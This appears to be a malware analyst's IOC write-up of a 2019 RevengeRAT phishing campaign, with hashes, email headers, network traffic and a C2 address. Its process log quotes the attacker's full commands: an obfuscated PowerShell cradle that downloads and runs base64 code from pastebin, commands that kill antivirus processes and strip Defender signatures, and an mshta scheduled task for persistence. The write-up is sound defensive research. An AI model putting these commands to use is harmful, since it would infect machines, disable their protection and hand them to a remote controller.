
#revengeRAT_110419

VRad Apr 12th, 2019 (edited) 501 Never
  1. #IOC #OptiData #VR #revenge #RAT #mshta #powershell #RTF #XML #pastebin
  2.  
  3. https://pastebin.com/JKMHyvgx
  4.  
  5. FAQ:
  6. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
  7. https://xakep.ru/2016/09/01/revenge-rat/
  8.  
  9. attack_vector
  10. --------------
  11. email attachment (.xlam / .doc) > mshta GET pastebin1 > powershell > GET pastebin2 (base64) > run decoded exe in memory(!)
  12.  
  13. email_headers
  14. --------------
  15. Received: from maiilboxin.com (unknown [138.197.202.86])
  16. Received: from [216.170.122.25]
  17. Subject: FW:PAYMENT -INV0978
  18. To: user00@victim1.com
  19. From: "Accounting dept." <support@maiilboxin.com>
  20. Date: Thu, 11 Apr 2019 17:25:23 -0700
  21.  
  22. files
  23. --------------
  24. SHA-256     1c0cf0e8e66cff93fb9751874b39bd3099b245c424386d2415fb55c937b31595
  25. File name   INV0978.xlam        [Microsoft Excel 2007+, XML, Macro, Auto_Open]
  26. File size   21.67 KB (22188 bytes)
  27.  
  28. SHA-256     187309d3b4688db0e9e98a40a83a497cbda7baecbaf0d0761f589f059040b670
  29. File name   TT copy.doc (RTF)       [Rich Text Format data, version 1, ANSI]
  30. File size   356.87 KB (365432 bytes)
  31.  
  32. SHA-256     e2c972dacd94f06555b108f96b39f1435202d04c92006721556ffe5cf14c74bd
  33. File name   aiahAcur    (payload_1.exe) [PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows]
  34. File size   17 KB (17408 bytes)
  35.  
  36.  
  37. activity
  38. **************
  39. INV0978.xlam > mshta pastebin{.} com/raw/gnYu4MJK   > powershell pastebin{.} com/raw/aiahAcur
  40.  
  41. TT copy.doc >  mshta pastebin{.} com/raw/gnYu4MJK   > powershell pastebin{.} com/raw/aiahAcur
  42.  
  43. PL_SRC: 104.20.209.21   pastebin{.} com/raw/aiahAcur
  44.  
  45. C2: 23.249.165.151  indexghost{.} duckdns{.} org
  46.  
  47. network
  48. --------------
  49. ssl
  50. 104.20.209.21   pastebin{.} com     Client Hello
  51.  
  52. C2
  53. 23.249.165.151  [TCP ACKed unseen segment] 50092 → 2336 [PSH, ACK] Seq=322 Ack=12 Win=62499 Len=11   
  54.  
  55. comp
  56. --------------
  57. mshta.exe       3540    TCP localhost   50090   104.20.209.21   443 ESTABLISHED
  58. powershell.exe  3960    TCP localhost   50091   104.20.209.21   443 ESTABLISHED
  59. powershell.exe  3960    TCP localhost   50092   23.249.165.151  2336    ESTABLISHED
  60.  
  61. proc
  62. --------------
  63. "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
  64.  
  65. C:\Windows\SysWOW64\mshta.exe  https://pastebin{.} com/raw/gnYu4MJK
  66.  
  67. "C:\Windows\System32\cmd.exe" /C forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & exit
  68. C:\Windows\SysWOW64\forfiles.exe  /c "taskkill /f /im AvastUi.exe"
  69.  
  70. "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files (x86)\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & forfiles /c "taskkill /f /im MSASCuiL.exe" & forfiles /c "taskkill /f /im MpCmdRun.exe" & exit
  71.  
  72. "C:\Windows\System32\forfiles.exe" /c "cmd /c powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin{.} com/raw/aiahAcur'))).EnTrYPoInT.InVoKe($N,$N)"
  73. C:\Windows\SysWOW64\cmd.exe /c powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin{.} com/raw/aiahAcur'))).EnTrYPoInT.InVoKe($N,$N)
  74. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin{.} com/raw/aiahAcur'))).EnTrYPoInT.InVoKe($N,$N)
  75.  
  76. "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://pastebin{.} com/raw/aiahAcur\",0,true)(window.close)" /F
  77.  
  78. persist
  79. --------------
  80. \MSOFFICEER
  81. Microsoft (R) HTML Application host Microsoft Corporation  
  82. c:\windows\system32\mshta.exe   14.10.2013 8:47
  83. "mshta" vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin{.} com/raw/aiahAcur",0,true)(window.close)
  84.  
  85. drop
  86. --------------
  87. [harmful]
  88. %temp%\fqkril4n.4zd.ps1
  89.  
  90. [harmless]
  91. %temp%\~DFC438B89F8956E942.TMP
  92. %temp%\9568250.od
  93. %temp%\CVRFFFA.tmp.cvr
  94.  
  95. # # #
  96. https://www.virustotal.com/gui/file/1c0cf0e8e66cff93fb9751874b39bd3099b245c424386d2415fb55c937b31595/details
  97. https://www.virustotal.com/gui/file/187309d3b4688db0e9e98a40a83a497cbda7baecbaf0d0761f589f059040b670/details
  98. https://www.virustotal.com/gui/url/6b8f2a876d58ae681f494eac0d978800b2f3aa3d149abb55f6859c79ae238901/details
  99. https://www.virustotal.com/gui/url/5e197c5b281e3d7a436f2b0800180085e1a5ad5f80b3649ef3225e3fdafa8e38/details
  100. https://www.virustotal.com/gui/file/e2c972dacd94f06555b108f96b39f1435202d04c92006721556ffe5cf14c74bd/details
  101. https://analyze.intezer.com/#/analyses/a6f1dcf3-4672-4297-ac7a-a8f0f5b60c1d
  102.  
  103. VR